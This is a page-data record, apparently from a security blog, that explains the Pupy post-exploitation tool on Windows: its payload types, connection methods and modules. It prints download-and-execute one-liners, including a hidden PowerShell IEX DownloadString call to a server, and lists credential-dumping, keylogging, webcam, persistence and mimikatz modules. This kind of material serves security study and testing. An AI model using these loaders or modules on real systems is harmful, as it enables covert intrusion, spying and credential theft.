[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYHSdyv_RvCzYK2u3JPfVMXQR8Q89tgZ9tYHDwHNK1zg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},407,"What are the supported payload file types generated by Pupy on Windows?","Pupy on Windows supports multiple payload file types including EXE (via `client`), fully packaged Python files (`py`), PyInstaller-compatible Python files (`pyinst`), PowerShell scripts (`ps1`), one-liner download-and-execute variants (`py_oneliner`, `ps1_oneliner`), Rubber Ducky scripts (`rubber_ducky`), C# files (`csharp`), .NET assemblies (`.NET`), and in-memory .NET loading via PowerShell (`.NET_oneliner`). Each type is tailored for different execution environments and stealth requirements, as detailed in the [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform) article.","\u003Cp>Pupy on Windows supports multiple payload file types including EXE (via `client`), fully packaged Python files (`py`), PyInstaller-compatible Python files (`pyinst`), PowerShell scripts (`ps1`), one-liner download-and-execute variants (`py_oneliner`, `ps1_oneliner`), Rubber Ducky scripts (`rubber_ducky`), C# files (`csharp`), .NET assemblies (`.NET`), and in-memory .NET loading via PowerShell (`.NET_oneliner`). Each type is tailored for different execution environments and stealth requirements, as detailed in the [Pupy Exploitation Analysis - Features on Windows Platform](\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform) article.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-supported-payload-file-types-generated-by-pupy-on-windows-1777483838106","Pupy, payload file types, Windows platform, EXE, PowerShell, C#, .NET, one-liner, rubber ducky",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},102,"Pupy Exploitation Analysis - Features on Windows Platform","pupy-exploitation-analysis-features-on-windows-platform","Analyze Pupy's Windows features: installation, payload types (EXE, Python, PS1), connection methods, and post-exploitation modules for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pupy is a cross-platform remote administration and post-exploitation tool developed in Python, supporting many practical features.\u003C\u002Fp>\u003Cp>This article will introduce the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, classify its post-exploitation modules, and detail each function.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Installation Methods\u003C\u002Fli>\u003Cli>Supported Startup File Types\u003C\u002Fli>\u003Cli>Supported Connection Methods\u003C\u002Fli>\u003Cli>Supported Communication Protocols\u003C\u002Fli>\u003Cli>Introduction to Post-Exploitation Modules\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Installation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using docker\u003C\u002Fh3>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FInstallation\u003C\u002Fp>\u003Ch3>2. Direct installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone --recursive https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u003Cbr>cd pupy\u003Cbr>python create-workspace.py -DG pupyws\u003Cbr>pupyws\u002Fbin\u002Fpupysh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the -DG parameter will download template files from https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch2>0x03 Supported payload file types\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After starting pupy, enter gen -h to get instructions for generating payload files, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017291528_0_db8aa684db.jpeg\">\u003C\u002Fp>\u003Cp>Here is a detailed introduction one by one\u003C\u002Fp>\u003Ch3>1.client\u003C\u002Fh3>\u003Cp>Generate files in EXE format\u003C\u002Fp>\u003Cp>Example command for generating a 64-bit EXE file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f client -A x64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and generate the final EXE file\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The template file name corresponding to the above command is pupyx64.exe. The download link for the template file is: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch3>2.py\u003C\u002Fh3>\u003Cp>Generate a fully packaged Python file (all dependencies are packaged and executed from memory)\u003C\u002Fp>\u003Cp>Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will generate a Python file with content in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import zlib,marshal;exec marshal.loads(zlib.decompress('xxxxxxxxx')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where 'xxxxxxxxx' is the encrypted content\u003C\u002Fp>\u003Cp>The encryption method roughly involves serializing the code using marshal.dumps, followed by operations such as offset and XOR. For the specific encryption algorithm, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Futils\u002Fobfuscate.py#L9\u003C\u002Fp>\u003Cp>To cancel the encryption process and obtain the source file, add the --debug parameter. Example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding code location: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Fpayloads\u002Fpy_oneliner.py#L43\u003C\u002Fp>\u003Cp>The code logic is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if debug:\u003Cbr>    return payload\u003Cbr>return compress_encode_obfs(payload, main=True)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To run this Python file in a Windows Python environment, the following modules also need to be installed on Windows:\u003C\u002Fp>\u003Cul>\u003Cli>pywin32\u003C\u002Fli>\u003Cli>pycryptodome\u003C\u002Fli>\u003Cli>Crypto\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The Crypto package needs to be downloaded from http:\u002F\u002Fwww.voidspace.org.uk\u002Fpython\u002Fmodules.shtml#pycrypto\u003C\u002Fp>\u003Ch3>3.pyinst\u003C\u002Fh3>\u003Cp>Generate Python files compatible with pyinstaller\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f pyinst\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Difference from gen -f py: adds some header files to facilitate converting Python scripts to exe files using pyinstaller\u003C\u002Fp>\u003Cp>The usage of pyinstaller was introduced in the previous article 'Custom Script Development in Local Password Viewer LaZagne'\u003C\u002Fp>\u003Ch3>4.py_oneliner\u003C\u002Fh3>\u003Cp>Download and execute Python code from a server via the urllib library\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output the download and execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python -c 'import urllib;exec urllib.urlopen(\"http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J\").read()'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5.ps1\u003C\u002Fh3>\u003Cp>Generate startup code in powershell format, which first starts a Powershell process and then loads the dll within the Powershell process\u003C\u002Fp>\u003Cp>Command example for generating 32-bit files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command reads the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, adds configuration information and obfuscated Invoke-ReflectivePEInjection code, ultimately achieving DLL loading within the Powershell process.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll.\u003C\u002Fp>\u003Ch3>6.ps1_oneliner\u003C\u002Fh3>\u003Cp>Downloads and executes Powershell code from a server via IEX(New-Object Net.WebClient).DownloadString.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the download-and-execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http:\u002F\u002F192.168.1.1:9000\u002FDfsP5d2GPG\u002FxDrhpNdNTU');\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the base64-encoded execution code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -enc xxxxxxxxxxxxxxxxxxxx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>7.rubber_ducky\u003C\u002Fh3>\u003Cp>Generates a Rubber Ducky script and an inject.bin file.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f rubber_ducky\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>8.csharp\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format)\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f csharp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and use Casey Smith's PELoader to load the PE file from memory\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll\u003C\u002Fp>\u003Cp>For compilation and usage methods of the C# file, refer to the previous article 'Loading PE Files from Memory via .NET'\u003C\u002Fp>\u003Ch3>9..NET\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format) and compile it with mono, ultimately producing an exe format file\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires installation of the mono development environment; the Kali installation command is apt-get install mono-mcs\u003C\u002Fp>\u003Cp>For usage of mono, refer to the previous article 'Executing Shellcode via Mono (Cross-platform .NET Runtime Environment)'\u003C\u002Fp>\u003Cp>This command adds the functionality of compiling with mono on top of gen -f csharp\u003C\u002Fp>\u003Ch3>10..NET_oneliner\u003C\u002Fh3>\u003Cp>Load .NET assemblies from memory via PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output PowerShell code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -w hidden -enc \"xxxxxxxxxxxxxx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command adds the functionality of loading .NET assemblies from memory via PowerShell on top of gen -f .NET\u003C\u002Fp>\u003Cp>The implementation code for loading .NET assemblies from memory via PowerShell is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::Load(\"\"(new-object net.webclient).DownloadData(\"\"'http:\u002F\u002F{link_ip}:{port}{landing_uri}')).GetTypes()[0].GetMethods(\"\")[0].Invoke($null,@())\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The previous article 'Analysis of Exploiting .NET Assembly Loading from Memory (Assembly.Load)' analyzed methods for loading .NET assemblies from memory\u003C\u002Fp>\u003Ch3>Additional: Extra parameters\u003C\u002Fh3>\u003Cp>For the generated launcher files, the following parameters are also supported:\u003C\u002Fp>\u003Cul>\u003Cli>Whether to compress\u003C\u002Fli>\u003Cli>Whether to use system proxy\u003C\u002Fli>\u003Cli>Set connection count and interval time\u003C\u002Fli>\u003Cli>Set Python script to execute before startup\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Supported Connection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The following four types are supported:\u003C\u002Fp>\u003Cul>\u003Cli>bind, bind port, used as a forward connection\u003C\u002Fli>\u003Cli>auto_proxy, retrieve possible SOCKS\u002FHTTP proxy lists and use them, retrieval methods include: registry, WPAD request, gnome settings, environment variable HTTP_PROXY\u003C\u002Fli>\u003Cli>dnscnc, DNS protocol? (This feature is currently untestable)\u003C\u002Fli>\u003Cli>connect, default method, reverse connect to server\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Supported Communication Protocols\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain list via command gen -l\u003C\u002Fp>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FGet-Started#transport\u003C\u002Fp>\u003Cp>Currently supports the following categories:\u003C\u002Fp>\u003Cul>\u003Cli>obfs3\u003C\u002Fli>\u003Cli>http\u003C\u002Fli>\u003Cli>ssl\u003C\u002Fli>\u003Cli>ecm\u003C\u002Fli>\u003Cli>tcp_cleartext\u003C\u002Fli>\u003Cli>dfws\u003C\u002Fli>\u003Cli>rsa\u003C\u002Fli>\u003Cli>udp_secure\u003C\u002Fli>\u003Cli>kc4\u003C\u002Fli>\u003Cli>ec4\u003C\u002Fli>\u003Cli>ws\u003C\u002Fli>\u003Cli>scramblesuit\u003C\u002Fli>\u003Cli>udp_cleartext\u003C\u002Fli>\u003Cli>ssl_rsa\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Communication protocols of the above categories can be customized, modification location: pupy\u002Fpupy\u002Fnetwork\u002Ftransports\u002F\u003Ctransport_name>\u002Fconf.py\u003C\u002Ftransport_name>\u003C\u002Fp>\u003Ch2>0x06 Post-Exploitation Module Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Cp>Set listening port: listen -a ssl 8443\u003C\u002Fp>\u003Cp>View sessions: sessions\u003C\u002Fp>\u003Cp>Switch session: sessions -i \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Terminate session: sessions -k \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Usage example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017322122_1_72a62add13.jpeg\">\u003C\u002Fp>\u003Cp>After obtaining a session, enter help -M to display supported post-exploitation modules. Here, these modules are categorized and their functions introduced one by one\u003C\u002Fp>\u003Ch3>1. Privilege Escalation\u003C\u002Fh3>\u003Cp>(1) Use beroot to obtain information for privilege escalation, module: beroot\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FBeRoot\u003C\u002Fp>\u003Cp>(2) Use WinPwnage to attempt privilege escalation, module: bypassuac\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002Frootm0s\u002FWinPwnage\u003C\u002Fp>\u003Cp>(3) Switch to SYSTEM privileges, module: getsystem\u003C\u002Fp>\u003Cp>(4) Use Windows PowerShell ADIDNS\u002FLLMNR\u002FmDNS\u002FNBNS spoofer\u002Fman-in-the-middle tool Inveigh, module: inveigh\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FKevin-Robertson\u002FInveigh\u003C\u002Fp>\u003Ch3>2. Processes\u003C\u002Fh3>\u003Cp>(1) List\u002Fimpersonate process tokens, module: impersonate\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to the previous article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Cp>(2) Obtain current privileges, module: getprivs\u003C\u002Fp>\u003Cp>For privilege exploitation methods, refer to the previous article 'Penetration Techniques - Exploitation of Nine Windows Privileges'\u003C\u002Fp>\u003Cp>(3) Obtain the parent process of the current process, module: getppid\u003C\u002Fp>\u003Cp>For privilege switching via parent processes, refer to the previous article 'Penetration Techniques - Switching from Admin to System Privileges'\u003C\u002Fp>\u003Ch3>3. Credential Acquisition\u003C\u002Fh3>\u003Cp>(1) Use Lazagne to obtain credentials, module: lazagne\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FLaZagne\u002F\u003C\u002Fp>\u003Cp>The previous article 'Custom Script Development in the Local Password Viewer Tool LaZagne' introduced LaZagne\u003C\u002Fp>\u003Cp>(2) Export local user hashes from the registry, module: creddump\u003C\u002Fp>\u003Cp>For related details, you can refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>(3) Monitor memory and search for plaintext credentials, module: loot_memory\u003C\u002Fp>\u003Cp>Once enabled, it will continuously monitor memory.\u003C\u002Fp>\u003Cp>(4) Dump printable strings from process memory for further analysis, module: memstrings\u003C\u002Fp>\u003Cp>Can target specified processes; output format is a text file.\u003C\u002Fp>\u003Ch3>4. Network-related\u003C\u002Fh3>\u003Cp>(1) Send Get\u002FPost requests via HTTP protocol, module: http\u003C\u002Fp>\u003Cp>(2) TCP port scanning, module: port_scan\u003C\u002Fp>\u003Cp>(3) Port forwarding and SOCKS proxy, module: forward\u003C\u002Fp>\u003Cp>(4) Packet capture, module: tcpdump\u003C\u002Fp>\u003Cp>(5) UPnP operations, module: igd\u003C\u002Fp>\u003Cp>(6) Obtain certificates from servers, module: x509\u003C\u002Fp>\u003Ch3>5. Screen control\u003C\u002Fh3>\u003Cp>(1) Module for controlling the target screen via a browser: rdesktop\u003C\u002Fp>\u003Cp>After loading, you can control the target's screen through a browser, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017371161_2_d40bdf2647.jpeg\">\u003C\u002Fp>\u003Cp>Not only can view screen content, but also send mouse and keyboard messages\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Remote Desktop Protocol (RDP) is not used here\u003C\u002Fp>\u003Cp>(2) Using Remote Desktop Protocol (RDP), module: rdp\u003C\u002Fp>\u003Cp>Can be used to enable or disable remote desktop connections, and also supports verifying credentials of remote hosts\u003C\u002Fp>\u003Ch3>6. Monitoring\u003C\u002Fh3>\u003Cp>(1) Keyboard and clipboard logging, module: keylogger\u003C\u002Fp>\u003Cp>(2) Record mouse clicks and capture surrounding areas, module: mouselogger\u003C\u002Fp>\u003Cp>(3) Screenshot, module: screenshot\u003C\u002Fp>\u003Cp>(4) Microphone recording, module: record_mic\u003C\u002Fp>\u003Cp>(5) Webcam capture, module: webcamsnap\u003C\u002Fp>\u003Ch3>7. Obtain system information\u003C\u002Fh3>\u003Cp>(1) View logs, module: logs\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017394493_3_28feb5695b.jpeg\">\u003C\u002Fp>\u003Cp>(2) Registry, module: reg\u003C\u002Fp>\u003Cp>Includes query, add, delete, modify, and search operations\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017437243_4_0c6fa9f635.jpeg\">\u003C\u002Fp>\u003Cp>(3) List local and remote shared folders and permissions, module: shares\u003C\u002Fp>\u003Cp>(4) View currently logged-in users, module: w\u003C\u002Fp>\u003Cp>(5) Retrieve service information, module: services\u003C\u002Fp>\u003Cp>(6) Get time, module: date\u003C\u002Fp>\u003Cp>(7) Retrieve EC2\u002FDigitalOcean metadata, module: cloudinfo\u003C\u002Fp>\u003Cp>(8) View and modify environment variables, module: env\u003C\u002Fp>\u003Cp>(9) Virtual machine detection, module: check_vm\u003C\u002Fp>\u003Cp>Supports identification of the following virtual machines:\u003C\u002Fp>\u003Cul>\u003Cli>Hyper-V\u003C\u002Fli>\u003Cli>VMWare\u003C\u002Fli>\u003Cli>Virtual PC\u003C\u002Fli>\u003Cli>Virtual Box\u003C\u002Fli>\u003Cli>Xen Machine\u003C\u002Fli>\u003Cli>Qemu machine\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Identification method: Query the registry\u003C\u002Fp>\u003Ch3>8. Execute Python commands\u003C\u002Fh3>\u003Cp>(1) Execute a single command, module: pyexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyexec -c \"import platform;print platform.uname()\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute Python commands in an interactive shell, module: pyshell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyshell\u003Cbr>import platform\u003Cbr>print platform.uname()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Load Python package, module: load_package\u003C\u002Fp>\u003Ch3>9. Execute CMD Commands\u003C\u002Fh3>\u003Cp>(1) Execute CMD commands via subprocess, module: shell_exec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>shell_exec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Simple popen call executed on a thread (slower but safer), module: pexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pexec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Interactive shell, module: interactive_shell\u003C\u002Fp>\u003Cp>Modified from winpty\u003C\u002Fp>\u003Cp>(4) Execute shellcode, module: shellcode_exec\u003C\u002Fp>\u003Cp>(5) Execute file in memory, module: memory_exec\u003C\u002Fp>\u003Ch3>10. Execute CMD Commands Remotely\u003C\u002Fh3>\u003Cp>Use smbexec\u002Fwmiexec to achieve remote command execution, module: psexec\u003C\u002Fp>\u003Cp>Supports using hash\u003C\u002Fp>\u003Ch3>11. Maintain Persistence\u003C\u002Fh3>\u003Cp>(1) Persistence, module: persistence\u003C\u002Fp>\u003Cp>For more methods, refer to: an open-source project\u003C\u002Fp>\u003Cp>(2) Duplicate current session, module: duplicate\u003C\u002Fp>\u003Cp>(3) Process migration, module: migrate\u003C\u002Fp>\u003Ch3>12. mimikatz\u003C\u002Fh3>\u003Cp>(1) Load mimikatz in memory, execute single command, module: mimikatz\u003C\u002Fp>\u003Cp>(2) Load mimikatz in memory, interactive, module: mimishell\u003C\u002Fp>\u003Ch3>13. powerview\u003C\u002Fh3>\u003Cp>(1) Direct invocation, module: powerview\u003C\u002Fp>\u003Cp>(2) Rewritten in Python, module: pywerview\u003C\u002Fp>\u003Ch3>14. File operations\u003C\u002Fh3>\u003Cp>(1) Upload, module: upload\u003C\u002Fp>\u003Cp>(2) Download, module: download\u003C\u002Fp>\u003Cp>(3) View file or folder attributes, module: stat\u003C\u002Fp>\u003Cp>(4) Edit file, module: edit\u003C\u002Fp>\u003Cp>(5) Write to file, module: write\u003C\u002Fp>\u003Cp>(6) Search files using Windows Search Index, module: isearch\u003C\u002Fp>\u003Cp>(7) Search for characters in all files under a specified directory, module: search\u003C\u002Fp>\u003Cp>(8) Access file shares via SMB protocol, module: smb\u003C\u002Fp>\u003Cp>(9) Connect to remote shared directory and search for files, module: smbspider\u003C\u002Fp>\u003Ch3>15. SSH client\u003C\u002Fh3>\u003Cp>(1) Connect to remote SSH server and execute commands, module: ssh\u003C\u002Fp>\u003Cp>(2) Connect to remote SSH server for a full interactive session, module: sshell\u003C\u002Fp>\u003Ch3>16. Outlook\u003C\u002Fh3>\u003Cp>Interact with the target user's Outlook session, module: outlook\u003C\u002Fp>\u003Ch3>17. Compression and decompression\u003C\u002Fh3>\u003Cp>Zip compression and decompression, module: zip\u003C\u002Fp>\u003Ch3>18. Lock screen\u003C\u002Fh3>\u003Cp>Module: lock_screen\u003C\u002Fp>\u003Ch3>19. View information of the connected back session\u003C\u002Fh3>\u003Cp>(1) Obtain network information for all sessions, module: netstat\u003C\u002Fp>\u003Cp>(2) Obtain information for the current session, module: get_info\u003C\u002Fp>\u003Cp>(3) View acquired credential information, command: creds\u003C\u002Fp>\u003Cp>(4) View server configuration information, command: config\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, categorizes its post-exploitation modules, and describes the functionality of each one.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pupy is a cross-platform remote administration and post-exploitation tool developed in Python, supporting many practical features.\u003C\u002Fp>\u003Cp>This article will introduce the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, classify its post-exploitation modules, and detail each function.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Installation Methods\u003C\u002Fli>\u003Cli>Supported Startup File Types\u003C\u002Fli>\u003Cli>Supported Connection Methods\u003C\u002Fli>\u003Cli>Supported Communication Protocols\u003C\u002Fli>\u003Cli>Introduction to Post-Exploitation Modules\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 